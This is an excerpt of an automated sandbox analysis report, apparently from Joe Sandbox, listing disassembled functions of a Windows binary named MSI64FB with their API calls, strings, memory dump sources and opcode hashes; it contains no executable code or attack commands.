                                                                                                                                                                                                                                                    • Instruction ID: 0ec3f919f61a1b915f2e53a5bb94412c01f50b32ca9443847f5706560e61921f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ede5a0b6ed619ab1c9e683908661bffefd74f46d039d7be0245d02b2f95aec8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F513B36B1C642C6E720FF26E8815B9A771BB49788FC05135EA4D47AD6EF3CE4408760
                                                                                                                                                                                                                                                    Function 00007FF749F45A80 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3397401024-0
                                                                                                                                                                                                                                                    • Opcode ID: e2a5f8d9e8f60080174f79bf089e6ca0881c36968e936192699cda913d76063d
                                                                                                                                                                                                                                                    • Instruction ID: 3e4fb2673faeb6d18478c98ad57fde4ce190a33678443ae28698308167114865
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2a5f8d9e8f60080174f79bf089e6ca0881c36968e936192699cda913d76063d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6313632A19A4085EB40EF61F8446AAB7B4BB487A8F944234EE6D07BE4DF38D055C710
                                                                                                                                                                                                                                                    Function 00007FF749F78D5C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: c4d06db6656c5a7f97c831f89d2f69de82a2f983ad5f790ab5c4857bf2cfd4f4
                                                                                                                                                                                                                                                    • Instruction ID: ee04d319ab66994ed257c2478a71e9502bbecdbb266bdc6edbab13e8d24a1ddd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4d06db6656c5a7f97c831f89d2f69de82a2f983ad5f790ab5c4857bf2cfd4f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30113022B18F01CAEB00EF64E8542B973B4FB59768F841E31EA6D867A4DF7CD1548350
                                                                                                                                                                                                                                                    Function 00007FF749F5B618 Relevance: 5.5, Strings: 3, Instructions: 1755COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+XxPp$false$gfffffff
                                                                                                                                                                                                                                                    • API String ID: 3382485803-1963183185
                                                                                                                                                                                                                                                    • Opcode ID: d5930b85c512c2f5a709a7304efc8b54f1e46f52a8e9e10162cbe9e8de025b2c
                                                                                                                                                                                                                                                    • Instruction ID: 46188de30abac4bd468dae59bc4d14fda4b85a2093d20fa405338862b30107f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5930b85c512c2f5a709a7304efc8b54f1e46f52a8e9e10162cbe9e8de025b2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF2CF26A1DA86D9EB50BF19D05017DB3B0FB41B94B959031DE4E077E2DF2DEA61C320
                                                                                                                                                                                                                                                    Function 00007FF749F52C64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                    • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                    • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                    • Opcode ID: 616e43936ec902d1dc742f22eaf0e87de50901db09d4db379d3a225a9463c699
                                                                                                                                                                                                                                                    • Instruction ID: 965527366965815b36e62cda29de62be87127ecd30a0db38e86fa2885be02158
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 616e43936ec902d1dc742f22eaf0e87de50901db09d4db379d3a225a9463c699
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1901C472B1C781D2E711AF52B4047AAE7B1FB947A4F948135DA4907AD6CF3CD6008710
                                                                                                                                                                                                                                                    Function 00007FF749F64ACC Relevance: 5.0, Strings: 3, Instructions: 1270COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: $$+xv$0123456789-
                                                                                                                                                                                                                                                    • API String ID: 593203224-2753741353
                                                                                                                                                                                                                                                    • Opcode ID: 1f80f7756efb86f841f614346cbe935230819cbf8c4a37f4fb44688887ca9f98
                                                                                                                                                                                                                                                    • Instruction ID: 73faf1315ccfe0b4a5f0729d210eb7ecfd2d4769f92adcd849f842ce5be85d60
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f80f7756efb86f841f614346cbe935230819cbf8c4a37f4fb44688887ca9f98
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9C26D22A0CB46C9EB50BF65D49017DA771FB64B88B945032DE4E57BE4DF39E892C320
                                                                                                                                                                                                                                                    Function 00007FF749F85F50 Relevance: 4.8, APIs: 3, Instructions: 333COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                                                                                    • Opcode ID: fab9e9aadd0945b81b897f5b7e49811b4a2b465777061b46d84eb23cdca4304d
                                                                                                                                                                                                                                                    • Instruction ID: 304efdab89d601c732ec6fe764379bfb6a2d5389cec1b4236e664fb9b8f6578c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fab9e9aadd0945b81b897f5b7e49811b4a2b465777061b46d84eb23cdca4304d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBC1C372A1C68AC7EB64EF15A04466EF7A1F784B84F809534DB4E67784DB3DE805CB40
                                                                                                                                                                                                                                                    Function 00007FF749F98080 Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4006003004-0
                                                                                                                                                                                                                                                    • Opcode ID: cff1a024b7ca25e247c22c251b87b96aec1e6be7386127725a097ef0d44f4a67
                                                                                                                                                                                                                                                    • Instruction ID: 6d51b5a6262922a875c814372d89fff328a68e48e45694bce9eec5d0803e17c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cff1a024b7ca25e247c22c251b87b96aec1e6be7386127725a097ef0d44f4a67
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C615A72A0CA42CAEB64BF11E5802B9A3B1FB46744FC48135CB9E936D1DF3CE5508B20
                                                                                                                                                                                                                                                    Function 00007FF749F41B70 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,?,00000001,00007FF749F41B37,?,?,?,00007FF749F41C33,?,?,00000000,00007FF749F4192F), ref: 00007FF749F41B8D
                                                                                                                                                                                                                                                    • LockResource.KERNEL32(?,?,00000001,00007FF749F41B37,?,?,?,00007FF749F41C33,?,?,00000000,00007FF749F4192F), ref: 00007FF749F41B9B
                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,?,00000001,00007FF749F41B37,?,?,?,00007FF749F41C33,?,?,00000000,00007FF749F4192F), ref: 00007FF749F41BAF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2853612939-0
                                                                                                                                                                                                                                                    • Opcode ID: 179892a1440a4011f79a316d4eae2f10d9d3d726f8d41b0866252d13db6c999d
                                                                                                                                                                                                                                                    • Instruction ID: 4e88897d029fbba9cce96b192dce61f08f4dbf79009d1f19d111fcda8d365c13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 179892a1440a4011f79a316d4eae2f10d9d3d726f8d41b0866252d13db6c999d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18019211B8EB62C9EF547F61A4409BAA2B0AF69B94B9C4434DA5E477D4FE3CD580C320
                                                                                                                                                                                                                                                    Function 00007FF749F5CD40 Relevance: 4.3, Strings: 2, Instructions: 1755COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                                                                                                    • API String ID: 593203224-1108341528
                                                                                                                                                                                                                                                    • Opcode ID: 23437879f8f8bbbd83cd7ef2506f5276b2d79456625c569b7ff5b62d3da9fe65
                                                                                                                                                                                                                                                    • Instruction ID: 916e1f5bd201a61bf0777ae6edf022cff16c39d8da2cf6d0e4742568ab1f982a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23437879f8f8bbbd83cd7ef2506f5276b2d79456625c569b7ff5b62d3da9fe65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F2B026A0EA86E5EB54BF19D05017DB3B1FB41B94BD59031DA4E07BE2CF2DE961C320
                                                                                                                                                                                                                                                    Function 00007FF749F5389C Relevance: 4.1, Strings: 2, Instructions: 1636COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                                                                                                    • API String ID: 593203224-1108341528
                                                                                                                                                                                                                                                    • Opcode ID: 1cff6a44de0b6a38148b453d4f792d451d2ba385b103e0bad3ab4c52e6c7189a
                                                                                                                                                                                                                                                    • Instruction ID: 40c1412355ad148768ca760e46c4a262ade89688b1d1000d9169aaac8e7ad64d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cff6a44de0b6a38148b453d4f792d451d2ba385b103e0bad3ab4c52e6c7189a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF2C222B0DA95E9EB15BF29C05037CB7B1AB11BA8F958031CA5D477E2DF2DD562C320
                                                                                                                                                                                                                                                    Function 00007FF749F638EC Relevance: 3.8, Strings: 2, Instructions: 1270COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: $0123456789-
                                                                                                                                                                                                                                                    • API String ID: 3382485803-700845222
                                                                                                                                                                                                                                                    • Opcode ID: aba340ba283b461763b65234a6a21242df17711b5e95ed629d2949f912da1099
                                                                                                                                                                                                                                                    • Instruction ID: 767e5d65bde41dc4fba44944d08fd89954c29e6f125a795c0666673f59023826
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aba340ba283b461763b65234a6a21242df17711b5e95ed629d2949f912da1099
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CC27A22A0CB46C9EB54BF65D4901BDA7B1FB55B88B945032DE4E07BE4DF39D892C320
                                                                                                                                                                                                                                                    Function 00007FF749F72804 Relevance: 3.7, Strings: 2, Instructions: 1199COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: $0123456789-
                                                                                                                                                                                                                                                    • API String ID: 593203224-700845222
                                                                                                                                                                                                                                                    • Opcode ID: ea1a7ed0626354bfb375fefa4a324b1dbd37c26bc19b7b9889c2d71dd7992db5
                                                                                                                                                                                                                                                    • Instruction ID: 89041725b8569322853a5cd34b8ca67f69c2649cbb587c2bfb3992740ba12caa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea1a7ed0626354bfb375fefa4a324b1dbd37c26bc19b7b9889c2d71dd7992db5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61C28B22A0CA81D9EB14AF65D4903BCAB71FB44B88F944071EA4E477E5DF7DE895C320
                                                                                                                                                                                                                                                    Function 00007FF749F91430 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF749F8D666), ref: 00007FF749F914A9
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F90F78: VirtualProtect.KERNELBASE ref: 00007FF749F91095
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F90F78: VirtualProtect.KERNELBASE ref: 00007FF749F910C6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$InfoLocale
                                                                                                                                                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                    • API String ID: 3721377114-2904428671
                                                                                                                                                                                                                                                    • Opcode ID: 25b3afd9655becdbee3a8b4e2ede03475dff7eafed07b1e7d8d320d88777900e
                                                                                                                                                                                                                                                    • Instruction ID: e953f141ea2e4cca0557d952bd7c39a1d29ad1f6e61bee0f29577e2406b08a25
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25b3afd9655becdbee3a8b4e2ede03475dff7eafed07b1e7d8d320d88777900e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD016121B0C646C1EB40BF1AA4005A9E7B1AF9ABE0FA84635DE2C177E5DE3CD5018250
                                                                                                                                                                                                                                                    Function 00007FF749F580A0 Relevance: 3.5, APIs: 2, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
